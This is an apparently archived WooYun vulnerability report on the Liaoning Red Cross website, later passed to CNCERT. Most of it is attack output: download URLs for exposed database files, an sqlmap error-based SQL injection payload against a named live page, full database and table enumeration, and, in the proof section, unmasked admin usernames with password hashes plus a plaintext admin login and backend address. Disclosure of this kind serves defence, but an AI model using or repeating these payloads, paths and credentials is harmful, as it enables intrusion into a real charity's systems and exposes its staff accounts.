当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0131784

漏洞标题:辽宁省红十字会漏洞打包

相关厂商:红十字会

漏洞作者: 路人甲

提交时间:2015-08-05 17:02

修复时间:2015-09-21 15:04

公开时间:2015-09-21 15:04

漏洞类型:任意文件遍历/下载

危害等级:高

自评Rank:15

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-08-05: 细节已通知厂商并且等待厂商处理中
2015-08-07: 厂商已经确认,细节仅向厂商公开
2015-08-17: 细节向核心白帽子及相关领域专家公开
2015-08-27: 细节向普通白帽子公开
2015-09-06: 细节向实习白帽子公开
2015-09-21: 细节向公众公开

简要描述:

RT

详细说明:

1.数据库下载
http://www.lnredcross.org.cn/bbs/boke/Data/Dvboke.mdb
http://www.lnredcross.org.cn/database/%23newasp.mdb
http://www.lnredcross.org.cn/HSH.mdb(1.3 G)

1.jpg


2.sql注入
http://www.lnredcross.org.cn/web/content.asp?id=2,3,4,5,6&name=%EF%BF%BD%EF%BF%BD%D6%AF%EF%BF%BD%EF%BF%BD%EF%BF%BD&articleid=2435

GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] 
sqlmap identified the following injection points with a total of 52 HTTP(s) requests:
---
Parameter: id (GET)
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: id=2,3,4,5,6) AND 8982=CONVERT(INT,(SELECT CHAR(113)+CHAR(120)+CHAR(113)+CHAR(112)+CHAR(113)+(SELECT (CASE WHEN (8982=8982) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(106)+CHAR(98)+CHAR(112)+CHAR(113))) AND (5589=5589&name=%EF%BF%BD%EF%BF%BD%D6%AF%EF%BF%BD%EF%BF%BD%EF%BF%BD&articleid=2435
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft SQL Server 2000
Database: tempdb
[2 tables]
+--------------------------------------------+
| sysconstraints |
| syssegments |
+--------------------------------------------+
Database: msdb
[82 tables]
+--------------------------------------------+
| RTblClassDefs |
| RTblDBMProps |
| RTblDBXProps |
| RTblDTMProps |
| RTblDTSProps |
| RTblDatabaseVersion |
| RTblEQMProps |
| RTblEnumerationDef |
| RTblEnumerationValueDef |
| RTblGENProps |
| RTblIfaceDefs |
| RTblIfaceHier |
| RTblIfaceMem |
| RTblMDSProps |
| RTblNamedObj |
| RTblOLPProps |
| RTblParameterDef |
| RTblPropDefs |
| RTblProps |
| RTblRelColDefs |
| RTblRelshipDefs |
| RTblRelshipProps |
| RTblRelships |
| RTblSIMProps |
| RTblScriptDefs |
| RTblSites |
| RTblSumInfo |
| RTblTFMProps |
| RTblTypeInfo |
| RTblTypeLibs |
| RTblUMLProps |
| RTblUMXProps |
| RTblVersionAdminInfo |
| RTblVersions |
| RTblWorkspaceItems |
| backupfile |
| backupmediafamily |
| backupmediaset |
| backupset |
| log_shipping_databases |
| log_shipping_monitor |
| log_shipping_plan_databases |
| log_shipping_plan_history |
| log_shipping_plans |
| log_shipping_primaries |
| log_shipping_secondaries |
| logmarkhistory |
| mswebtasks |
| restorefilegroup |
| restorefilegroup |
| restorehistory |
| sqlagent_info |
| sysalerts |
| syscachedcredentials |
| syscategories |
| sysconstraints |
| sysdbmaintplan_databases |
| sysdbmaintplan_history |
| sysdbmaintplan_jobs |
| sysdbmaintplans |
| sysdownloadlist |
| sysdtscategories |
| sysdtspackagelog |
| sysdtspackages |
| sysdtssteplog |
| sysdtstasklog |
| sysjobhistory |
| sysjobs_view |
| sysjobs_view |
| sysjobschedules |
| sysjobservers |
| sysjobsteps |
| sysnotifications |
| sysoperators |
| syssegments |
| systargetservergroupmembers |
| systargetservergroups |
| systargetservers_view |
| systargetservers_view |
| systaskids |
| systasks_view |
| systasks_view |
+--------------------------------------------+
Database: pubs
[14 tables]
+--------------------------------------------+
| authors |
| discounts |
| employee |
| jobs |
| pub_info |
| publishers |
| roysched |
| sales |
| stores |
| sysconstraints |
| syssegments |
| titleauthor |
| titles |
| titleview |
+--------------------------------------------+
Database: lnredcross
[36 tables]
+--------------------------------------------+
| NC_Adboard |
| D99_Tmp |
| NC_Account |
| NC_AddMoney |
| NC_Adlist |
| NC_Admin |
| NC_Announce |
| NC_Article |
| NC_Card |
| NC_Channel |
| NC_Classify |
| NC_Comment |
| NC_Config |
| NC_Confirm |
| NC_DownAddress |
| NC_DownServer |
| NC_Favorite |
| NC_FlashList |
| NC_Friend |
| NC_GuestBook |
| NC_GuestReply |
| NC_Link |
| NC_Message |
| NC_Online |
| NC_Paymode |
| NC_ScriptFile |
| NC_SoftList |
| NC_Special |
| NC_Template |
| NC_UserGroup |
| NC_UserGroup |
| NC_Vote |
| dtproperties |
| sysconstraints |
| syssegments |
| lnredcross_org_cn.sqlmapoutput |
+--------------------------------------------+
Database: master
[36 tables]
+--------------------------------------------+
| INFORMATION_SCHEMA.CHECK_CONSTRAINTS |
| INFORMATION_SCHEMA.COLUMNS |
| INFORMATION_SCHEMA.COLUMN_DOMAIN_USAGE |
| INFORMATION_SCHEMA.COLUMN_PRIVILEGES |
| INFORMATION_SCHEMA.CONSTRAINT_COLUMN_USAGE |
| INFORMATION_SCHEMA.CONSTRAINT_TABLE_USAGE |
| INFORMATION_SCHEMA.DOMAINS |
| INFORMATION_SCHEMA.DOMAIN_CONSTRAINTS |
| INFORMATION_SCHEMA.KEY_COLUMN_USAGE |
| INFORMATION_SCHEMA.PARAMETERS |
| INFORMATION_SCHEMA.REFERENTIAL_CONSTRAINTS |
| INFORMATION_SCHEMA.ROUTINES |
| INFORMATION_SCHEMA.ROUTINE_COLUMNS |
| INFORMATION_SCHEMA.SCHEMATA |
| INFORMATION_SCHEMA.TABLES |
| INFORMATION_SCHEMA.TABLE_CONSTRAINTS |
| INFORMATION_SCHEMA.TABLE_PRIVILEGES |
| INFORMATION_SCHEMA.VIEWS |
| INFORMATION_SCHEMA.VIEW_COLUMN_USAGE |
| INFORMATION_SCHEMA.VIEW_TABLE_USAGE |
| MSreplication_options |
| spt_datatype_info_ext |
| spt_datatype_info_ext |
| spt_fallback_db |
| spt_fallback_dev |
| spt_fallback_usg |
| spt_monitor |
| spt_provider_types |
| spt_server_info |
| spt_values |
| sysconstraints |
| syslogins |
| sysoledbusers |
| sysopentapes |
| sysremotelogins |
| syssegments |
+--------------------------------------------+
Database: Northwind
[31 tables]
+--------------------------------------------+
| Categories |
| CustomerCustomerDemo |
| CustomerDemographics |
| Customers |
| EmployeeTerritories |
| Employees |
| Invoices |
| Region |
| Shippers |
| Suppliers |
| Territories |
| Alphabetical list of products |
| Category Sales for 1997 |
| Current Product List |
| Customer and Suppliers by City |
| Order Details Extended |
| Order Details Extended |
| Order Subtotals |
| Orders Qry |
| Orders Qry |
| Product Sales for 1997 |
| Products Above Average Price |
| Products Above Average Price |
| Products by Category |
| Quarterly Orders |
| Sales Totals by Amount |
| Sales by Category |
| Summary of Sales by Quarter |
| Summary of Sales by Year |
| sysconstraints |
| syssegments |
+--------------------------------------------+
Database: lnredcross
Table: NC_Admin
[13 entries]
+---------------+------------------+
| username | password |
+---------------+------------------+
mask 区域
***** ac59075b*****
***** 06536de9*****
***** f44f4964*****
***** 965eb72c*****
***** 8ad9902a*****
***** 2e2594b4*****
***** 9443e0d8*****
***** 2b0f6f5e*****
***** d12b9ecc*****
***** aa4949bf*****
***** 197cca94*****
***** e69785d9*****
***** 965eb72c*****
*****---------*****


后台地址:http://www.lnredcross.org.cn/manage_redcross/admin_login.asp
admin/huawei@3com

漏洞证明:

1.数据库下载
http://www.lnredcross.org.cn/bbs/boke/Data/Dvboke.mdb
http://www.lnredcross.org.cn/database/%23newasp.mdb
http://www.lnredcross.org.cn/HSH.mdb(1.3 G)

1.jpg


2.sql注入
http://www.lnredcross.org.cn/web/content.asp?id=2,3,4,5,6&name=%EF%BF%BD%EF%BF%BD%D6%AF%EF%BF%BD%EF%BF%BD%EF%BF%BD&articleid=2435

GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] 
sqlmap identified the following injection points with a total of 52 HTTP(s) requests:
---
Parameter: id (GET)
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: id=2,3,4,5,6) AND 8982=CONVERT(INT,(SELECT CHAR(113)+CHAR(120)+CHAR(113)+CHAR(112)+CHAR(113)+(SELECT (CASE WHEN (8982=8982) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(106)+CHAR(98)+CHAR(112)+CHAR(113))) AND (5589=5589&name=%EF%BF%BD%EF%BF%BD%D6%AF%EF%BF%BD%EF%BF%BD%EF%BF%BD&articleid=2435
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft SQL Server 2000
Database: tempdb
[2 tables]
+--------------------------------------------+
| sysconstraints |
| syssegments |
+--------------------------------------------+
Database: msdb
[82 tables]
+--------------------------------------------+
| RTblClassDefs |
| RTblDBMProps |
| RTblDBXProps |
| RTblDTMProps |
| RTblDTSProps |
| RTblDatabaseVersion |
| RTblEQMProps |
| RTblEnumerationDef |
| RTblEnumerationValueDef |
| RTblGENProps |
| RTblIfaceDefs |
| RTblIfaceHier |
| RTblIfaceMem |
| RTblMDSProps |
| RTblNamedObj |
| RTblOLPProps |
| RTblParameterDef |
| RTblPropDefs |
| RTblProps |
| RTblRelColDefs |
| RTblRelshipDefs |
| RTblRelshipProps |
| RTblRelships |
| RTblSIMProps |
| RTblScriptDefs |
| RTblSites |
| RTblSumInfo |
| RTblTFMProps |
| RTblTypeInfo |
| RTblTypeLibs |
| RTblUMLProps |
| RTblUMXProps |
| RTblVersionAdminInfo |
| RTblVersions |
| RTblWorkspaceItems |
| backupfile |
| backupmediafamily |
| backupmediaset |
| backupset |
| log_shipping_databases |
| log_shipping_monitor |
| log_shipping_plan_databases |
| log_shipping_plan_history |
| log_shipping_plans |
| log_shipping_primaries |
| log_shipping_secondaries |
| logmarkhistory |
| mswebtasks |
| restorefilegroup |
| restorefilegroup |
| restorehistory |
| sqlagent_info |
| sysalerts |
| syscachedcredentials |
| syscategories |
| sysconstraints |
| sysdbmaintplan_databases |
| sysdbmaintplan_history |
| sysdbmaintplan_jobs |
| sysdbmaintplans |
| sysdownloadlist |
| sysdtscategories |
| sysdtspackagelog |
| sysdtspackages |
| sysdtssteplog |
| sysdtstasklog |
| sysjobhistory |
| sysjobs_view |
| sysjobs_view |
| sysjobschedules |
| sysjobservers |
| sysjobsteps |
| sysnotifications |
| sysoperators |
| syssegments |
| systargetservergroupmembers |
| systargetservergroups |
| systargetservers_view |
| systargetservers_view |
| systaskids |
| systasks_view |
| systasks_view |
+--------------------------------------------+
Database: pubs
[14 tables]
+--------------------------------------------+
| authors |
| discounts |
| employee |
| jobs |
| pub_info |
| publishers |
| roysched |
| sales |
| stores |
| sysconstraints |
| syssegments |
| titleauthor |
| titles |
| titleview |
+--------------------------------------------+
Database: lnredcross
[36 tables]
+--------------------------------------------+
| NC_Adboard |
| D99_Tmp |
| NC_Account |
| NC_AddMoney |
| NC_Adlist |
| NC_Admin |
| NC_Announce |
| NC_Article |
| NC_Card |
| NC_Channel |
| NC_Classify |
| NC_Comment |
| NC_Config |
| NC_Confirm |
| NC_DownAddress |
| NC_DownServer |
| NC_Favorite |
| NC_FlashList |
| NC_Friend |
| NC_GuestBook |
| NC_GuestReply |
| NC_Link |
| NC_Message |
| NC_Online |
| NC_Paymode |
| NC_ScriptFile |
| NC_SoftList |
| NC_Special |
| NC_Template |
| NC_UserGroup |
| NC_UserGroup |
| NC_Vote |
| dtproperties |
| sysconstraints |
| syssegments |
| lnredcross_org_cn.sqlmapoutput |
+--------------------------------------------+
Database: master
[36 tables]
+--------------------------------------------+
| INFORMATION_SCHEMA.CHECK_CONSTRAINTS |
| INFORMATION_SCHEMA.COLUMNS |
| INFORMATION_SCHEMA.COLUMN_DOMAIN_USAGE |
| INFORMATION_SCHEMA.COLUMN_PRIVILEGES |
| INFORMATION_SCHEMA.CONSTRAINT_COLUMN_USAGE |
| INFORMATION_SCHEMA.CONSTRAINT_TABLE_USAGE |
| INFORMATION_SCHEMA.DOMAINS |
| INFORMATION_SCHEMA.DOMAIN_CONSTRAINTS |
| INFORMATION_SCHEMA.KEY_COLUMN_USAGE |
| INFORMATION_SCHEMA.PARAMETERS |
| INFORMATION_SCHEMA.REFERENTIAL_CONSTRAINTS |
| INFORMATION_SCHEMA.ROUTINES |
| INFORMATION_SCHEMA.ROUTINE_COLUMNS |
| INFORMATION_SCHEMA.SCHEMATA |
| INFORMATION_SCHEMA.TABLES |
| INFORMATION_SCHEMA.TABLE_CONSTRAINTS |
| INFORMATION_SCHEMA.TABLE_PRIVILEGES |
| INFORMATION_SCHEMA.VIEWS |
| INFORMATION_SCHEMA.VIEW_COLUMN_USAGE |
| INFORMATION_SCHEMA.VIEW_TABLE_USAGE |
| MSreplication_options |
| spt_datatype_info_ext |
| spt_datatype_info_ext |
| spt_fallback_db |
| spt_fallback_dev |
| spt_fallback_usg |
| spt_monitor |
| spt_provider_types |
| spt_server_info |
| spt_values |
| sysconstraints |
| syslogins |
| sysoledbusers |
| sysopentapes |
| sysremotelogins |
| syssegments |
+--------------------------------------------+
Database: Northwind
[31 tables]
+--------------------------------------------+
| Categories |
| CustomerCustomerDemo |
| CustomerDemographics |
| Customers |
| EmployeeTerritories |
| Employees |
| Invoices |
| Region |
| Shippers |
| Suppliers |
| Territories |
| Alphabetical list of products |
| Category Sales for 1997 |
| Current Product List |
| Customer and Suppliers by City |
| Order Details Extended |
| Order Details Extended |
| Order Subtotals |
| Orders Qry |
| Orders Qry |
| Product Sales for 1997 |
| Products Above Average Price |
| Products Above Average Price |
| Products by Category |
| Quarterly Orders |
| Sales Totals by Amount |
| Sales by Category |
| Summary of Sales by Quarter |
| Summary of Sales by Year |
| sysconstraints |
| syssegments |
+--------------------------------------------+
Database: lnredcross
Table: NC_Admin
[13 entries]
+---------------+------------------+
| username | password |
+---------------+------------------+
| 123 | ac59075b964b0715 |
| admin | 06536de9f5104260 |
| asd | f44f4964e6c998de |
| bangongshi | 965eb72c92a549dd |
| dingdong | 8ad9902aecba32e2 |
| ganxibao | 2e2594b46e526824 |
| gwh | 9443e0d88214175f |
| machi | 2b0f6f5eae91475d |
| neibuzhuanlan | d12b9eccf90f9873 |
| rctest | aa4949bf181436f2 |
| xiangmuban | 197cca949bdb9c6d |
| zhenjibu | e69785d9338da63f |
| zuxuanbu | 965eb72c92a549dd |
+---------------+------------------+


后台地址:http://www.lnredcross.org.cn/manage_redcross/admin_login.asp
admin/huawei@3com

修复方案:

你们更专业

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:11

确认时间:2015-08-07 15:03

厂商回复:

CNVD确认所述情况,已经转由CNCERT下发给相应分中心,由其后续协调网站管理单位处置。

最新状态:

暂无